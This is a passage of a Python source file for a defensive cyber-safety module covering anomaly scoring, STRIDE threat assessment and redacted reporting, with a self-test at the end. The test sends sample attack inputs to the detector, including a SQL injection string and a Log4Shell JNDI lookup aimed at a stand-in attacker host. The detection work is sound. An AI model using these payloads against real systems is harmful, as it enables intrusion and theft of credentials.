            contributors.append("sequence")

        qnn_score = 0.0
        if self.use_qnn_inspired and numerical_features:
            vector = self._map_to_feature_vector(numerical_features)
            if np.any(vector):
                qnn_score = self._simulate_qnn_anomaly(vector)
                feature_scores["qnn_centroid"] = qnn_score
                if qnn_score >= self.anomaly_threshold:
                    contributors.append("qnn_centroid")

        final_score = max(feature_scores.values()) if feature_scores else 0.0
        normalized_score = clamp_score(final_score / max(self.anomaly_threshold * 2.0, 1.0))
        is_anomaly = final_score >= self.anomaly_threshold
        decision = threshold_decision(
            normalized_score,
            block_threshold=coerce_float(get_nested(self.cyber_config, "risk_thresholds.event_block"), 0.85),
            review_threshold=coerce_float(get_nested(self.cyber_config, "risk_thresholds.event_review"), 0.5),
        )
        reason = "Within normal parameters."
        if is_anomaly:
            reason = f"Anomaly score {final_score:.3f} exceeds threshold {self.anomaly_threshold:.3f}."
            if contributors:
                reason += f" Contributors: {', '.join(dedupe_preserve_order(contributors))}."

        result = EventAnalysisResult(
            schema_version=EVENT_SCHEMA_VERSION,
            event_id=generate_identifier("cyber_event"),
            timestamp=utc_iso(),
            event_type=event_type,
            entity=entity,
            anomaly_score=round(final_score, 6),
            normalized_anomaly_score=normalized_score,
            is_anomaly=is_anomaly,
            risk_level=categorize_risk(normalized_score),
            decision=decision,
            reason=reason,
            contributors=dedupe_preserve_order(contributors),
            feature_scores={k: round(v, 6) for k, v in feature_scores.items()},
            sequence=tuple(self.sequence_patterns[f"seq:{fingerprint(entity)}"]),
            metadata={"numeric_feature_count": len(numerical_features), "event_fingerprint": fingerprint(safe_event)},
        )
        self._store_analysis("event_analysis", result.to_dict(), sensitivity=coerce_float(get_nested(self.cyber_config, "memory.event_analysis_sensitivity", 0.65), 0.65))
        return result.to_dict()

    def _update_and_score_sequence(self, entity: str, event_type: str) -> float:
        key = f"seq:{fingerprint(entity)}"
        sequence = self.sequence_patterns[key]
        sequence.append(event_type)
        if len(sequence) < coerce_int(get_nested(self.cyber_config, "event_stream.min_sequence_length", 3), 3, minimum=2):
            return 0.0
        sequence_key = fingerprint(tuple(sequence))
        count = self.sequence_counts[sequence_key]
        self.sequence_counts[sequence_key] = count + 1
        novelty_weight = coerce_float(get_nested(self.cyber_config, "event_stream.sequence_novelty_weight", 5.0), 5.0, minimum=0.0)
        return max(0.0, novelty_weight - math.log1p(count))

    def _map_to_feature_vector(self, numerical_features: Mapping[str, Any]) -> np.ndarray:
        """Map numerical features to a fixed-size vector for QNN-inspired scoring."""

        vector = np.zeros(self.qnn_feature_dim, dtype=float)
        if not numerical_features:
            return vector
        for name in sorted(str(k) for k in numerical_features.keys()):
            try:
                value = coerce_float(numerical_features[name], 0.0)
            except Exception:
                continue
            target_idx = int(hash_text(name), 16) % self.qnn_feature_dim
            scale = coerce_float(get_nested(self.cyber_config, "event_stream.feature_scale", 1000.0), 1000.0, minimum=1.0)
            vector[target_idx] += math.tanh(value / scale) if abs(value) > 10 else value
        norm = np.linalg.norm(vector)
        return vector / norm if norm > 1e-9 else vector

    def _simulate_qnn_anomaly(self, feature_vector: np.ndarray) -> float:
        """Classical centroid-distance approximation for QNN-inspired anomaly detection."""

        if self.qnn_state_representation is None:
            self.qnn_state_representation = feature_vector.copy()
            norm = np.linalg.norm(self.qnn_state_representation)
            if norm > 1e-9:
                self.qnn_state_representation /= norm
            return 0.0

        centroid_norm = np.linalg.norm(self.qnn_state_representation)
        feature_norm = np.linalg.norm(feature_vector)
        if centroid_norm < 1e-9 or feature_norm < 1e-9:
            self.qnn_state_representation = feature_vector.copy()
            return 0.0

        centroid = self.qnn_state_representation / centroid_norm
        vector = feature_vector / feature_norm
        cosine_similarity = float(np.clip(np.dot(vector, centroid), -1.0, 1.0))
        distance = 1.0 - cosine_similarity
        self.qnn_state_representation = (1.0 - self.adaptive_centroid_lr) * centroid + self.adaptive_centroid_lr * vector
        updated_norm = np.linalg.norm(self.qnn_state_representation)
        if updated_norm > 1e-9:
            self.qnn_state_representation /= updated_norm
        return (distance ** 2) * coerce_float(get_nested(self.cyber_config, "event_stream.qnn_distance_scale", 2.5), 2.5, minimum=0.1)

    # ------------------------------------------------------------------
    # Threat modeling
    # ------------------------------------------------------------------

    def generate_threat_assessment(self, context_info: Dict[str, Any]) -> Dict[str, Any]:
        """Generate STRIDE-style threat assessment from action/component context."""

        printer.status("CYBER", "Generating threat assessment", "info")
        if not isinstance(context_info, Mapping):
            raise UnsafeExecutionError(operation="cyber_safety.generate_threat_assessment", risk_score=0.55, details="Threat assessment context must be a mapping.", component="cyber_safety")
        component = normalize_text(context_info.get("component", "unknown_component"), max_length=128, lowercase=True)
        action = normalize_text(context_info.get("action", "unknown_action"), max_length=128, lowercase=True)
        zone = normalize_text(context_info.get("network_zone", "internal"), max_length=80, lowercase=True)
        data_involved = context_info.get("data_involved", [])
        context_blob = stable_json(sanitize_for_logging(context_info))

        threats: Dict[str, List[str]] = defaultdict(list)
        rules = get_nested(self.cyber_config, "threat_modeling.rules", []) or []
        strict = coerce_bool(get_nested(self.cyber_config, "resource_loading.strict_pattern_validation", True), True)
        for rule in rules:
            if not isinstance(rule, Mapping):
                continue
            category = str(rule.get("category", "Unknown"))
            description = str(rule.get("description", "Potential cyber threat."))
            match_any = False
            values = {"component": component, "action": action, "network_zone": zone, "data": stable_json(data_involved), "context": context_blob}
            for field_name, field_value in values.items():
                for pattern in rule.get(f"{field_name}_patterns", []) or []:
                    try:
                        if re.search(str(pattern), str(field_value), re.IGNORECASE):
                            match_any = True
                    except re.error as exc:
                        if strict:
                            raise ConfigurationTamperingError(config_file_path="secure_config.yaml:cyber_safety.threat_modeling.rules", suspicious_change=f"Invalid threat-modeling regex: {exc}", component="cyber_safety") from exc
                if match_any:
                    break
            if match_any:
                threats[category].append(description)

        category_weights = get_nested(self.cyber_config, "threat_modeling.category_weights", {}) or {}
        score_parts: Dict[str, float] = {}
        for category, items in threats.items():
            base = coerce_float(category_weights.get(category, 0.4), 0.4, minimum=0.0, maximum=1.0)
            score_parts[category] = clamp_score(base + min(len(items), 5) * 0.06)
        risk_score = combine_risk_scores(*score_parts.values(), method="noisy_or") if score_parts else 0.0
        risk_level = categorize_risk(risk_score).title()
        result = ThreatAssessmentResult(
            schema_version=THREAT_SCHEMA_VERSION,
            assessment_id=generate_identifier("threat"),
            timestamp=utc_iso(),
            component=component,
            action=action,
            network_zone=zone,
            risk_score=risk_score,
            overall_risk=risk_level,
            threats=dict(threats),
            mitigations=self._threat_mitigations(threats),
            metadata={"threat_count": sum(len(v) for v in threats.values()), "context_fingerprint": fingerprint(context_blob)},
        )
        self._store_analysis("threat_assessment", result.to_dict(), sensitivity=coerce_float(get_nested(self.cyber_config, "memory.threat_assessment_sensitivity", 0.55), 0.55))
        return result.to_dict()

    def _threat_mitigations(self, threats: Mapping[str, List[str]]) -> List[str]:
        mitigation_map = get_nested(self.cyber_config, "threat_modeling.mitigations", {}) or {}
        mitigations: List[str] = []
        for category in threats:
            category_mitigations = mitigation_map.get(category, [])
            if isinstance(category_mitigations, str):
                mitigations.append(category_mitigations)
            elif isinstance(category_mitigations, Iterable):
                mitigations.extend(str(item) for item in category_mitigations)
        if not mitigations and threats:
            mitigations.append("Perform a focused threat-model review and document compensating controls.")
        elif not mitigations:
            mitigations.append("No STRIDE threats matched; continue routine monitoring and least-privilege review.")
        return dedupe_preserve_order(mitigations)

    # ------------------------------------------------------------------
    # Reporting and secure storage
    # ------------------------------------------------------------------

    def generate_report(self, analysis: Mapping[str, Any]) -> str:
        """Generate a redacted cyber-safety report for audit/review."""

        safe_analysis = sanitize_for_logging(dict(analysis))
        lines = [
            "# Cyber Safety Report",
            f"**Generated**: {utc_iso()}",
            f"**Module Version**: {MODULE_VERSION}",
            f"**Schema**: {safe_analysis.get('schema_version', 'unknown')}",
            f"**Risk Score**: {coerce_float(safe_analysis.get('risk_score', safe_analysis.get('normalized_anomaly_score', 0.0)), 0.0):.3f}",
            f"**Risk Level**: {safe_analysis.get('risk_level', safe_analysis.get('overall_risk', 'unknown'))}",
            f"**Decision**: {safe_analysis.get('decision', 'review')}",
            "---",
        ]
        findings = safe_analysis.get("findings", [])
        if findings:
            lines.append("## Findings")
            for finding in findings:
                lines.append(f"- **{finding.get('name', finding.get('finding_id', 'finding'))}** [{finding.get('finding_type', 'unknown')}]: severity={finding.get('severity')}, confidence={finding.get('confidence')}")
                if finding.get("description"):
                    lines.append(f"  - {finding['description']}")
                if finding.get("remediation"):
                    lines.append(f"  - Remediation: {finding['remediation']}")
        if safe_analysis.get("recommendations"):
            lines.append("## Recommendations")
            lines.extend(f"- {item}" for item in safe_analysis.get("recommendations", []))
        if safe_analysis.get("threats"):
            lines.append("## STRIDE Threats")
            for category, items in safe_analysis.get("threats", {}).items():
                lines.append(f"- **{category}**")
                lines.extend(f"  - {item}" for item in items)
        return "\n".join(lines)

    def _store_analysis(self, analysis_type: str, payload: Mapping[str, Any], *, sensitivity: float) -> None:
        if not coerce_bool(get_nested(self.cyber_config, "memory.store_analysis", True), True):
            return
        try:
            self.memory.add(
                sanitize_for_logging(dict(payload)),
                tags=list(get_nested(self.cyber_config, "memory.analysis_tags", ["cyber_safety", "analysis"])) + [normalize_identifier(analysis_type)],
                sensitivity=sensitivity,
                ttl_seconds=coerce_int(get_nested(self.cyber_config, "memory.analysis_ttl_seconds", 86400), 86400, minimum=0),
                purpose="cyber_safety_analysis",
                owner="cyber_safety",
                classification="confidential" if sensitivity >= 0.7 else "internal",
                source="cyber_safety",
                metadata={"analysis_type": analysis_type, "schema_version": payload.get("schema_version")},
            )
        except TypeError:
            self.memory.add(sanitize_for_logging(dict(payload)), tags=["cyber_safety", "analysis", normalize_identifier(analysis_type)], sensitivity=sensitivity)
        except Exception as exc:
            logger.warning("Failed to store cyber safety analysis: %s", exception_to_safe_dict(exc, operation="store_cyber_safety_analysis", component="cyber_safety"))
            if coerce_bool(get_nested(self.cyber_config, "memory.fail_closed_on_store_error", False), False):
                raise AuditLogFailureError(logging_target="secure_memory.cyber_safety", failure_mode=f"Failed to store {analysis_type}: {type(exc).__name__}", component="cyber_safety", cause=exc) from exc


if __name__ == "__main__":
    print("\n=== Running Cyber Safety ===\n")
    printer.status("TEST", "Cyber Safety initialized", "info")

    cyber = CyberSafetyModule()

    suspicious_payload = {
        "request": "GET /search?q=' UNION SELECT password FROM users -- HTTP/1.1",
        "headers": {
            "Authorization": "Bearer test_token_should_be_redacted_1234567890",
            "User-Agent": "${jndi:ldap://attacker.example/a}",
        },
        "body": "debug=true&password=admin&api_key=sk_test_abcdefghijklmnopqrstuvwxyz",
    }
    analysis = cyber.analyze_input(suspicious_payload, context="api_request")
    assert analysis["risk_score"] > 0.0
    assert analysis["decision"] in {"allow", "review", "block"}
    rendered = stable_json(analysis)
    assert "test_token_should_be_redacted" not in rendered
    assert "abcdefghijklmnopqrstuvwxyz" not in rendered
    printer.pretty("CYBER", analysis, "success")

    for idx in range(6):
        cyber.analyze_event_stream({
            "timestamp": time.time() + idx,
            "type": "login_attempt",
            "user": "alice",
            "ip_address": "10.0.0.5",
            "details": {"failed_logins": 1, "payload_size": 512, "duration_ms": 120},
        })
    anomaly = cyber.analyze_event_stream({
        "timestamp": time.time() + 20,
        "type": "login_attempt",
        "user": "alice",
        "ip_address": "10.0.0.5",
        "details": {"failed_logins": 20, "payload_size": 65535, "duration_ms": 3000},
    })
    assert "anomaly_score" in anomaly
    printer.pretty("EVENT", anomaly, "success")

    threat = cyber.generate_threat_assessment({
        "component": "internet_login_api",
        "action": "authenticate_and_update_role",
        "data_involved": ["username", "password_hash", "session_token", "error_details"],
        "network_zone": "internet",
        "resource_limit": "rate_limited",
    })
    assert threat["threats"]
    assert threat["overall_risk"] in {"Low", "Medium", "High", "Critical"}
    printer.pretty("THREAT", threat, "success")

    report = cyber.generate_report(analysis)
    assert "Cyber Safety Report" in report
    assert "test_token_should_be_redacted" not in report

    try:
        cyber.analyze_event_stream({"type": "missing_timestamp"})
        raise AssertionError("Expected structured SecurityError for missing timestamp")
    except SecurityError:
        printer.status("TEST", "Structured error path verified", "success")

    print("\n=== Test ran successfully ===\n")
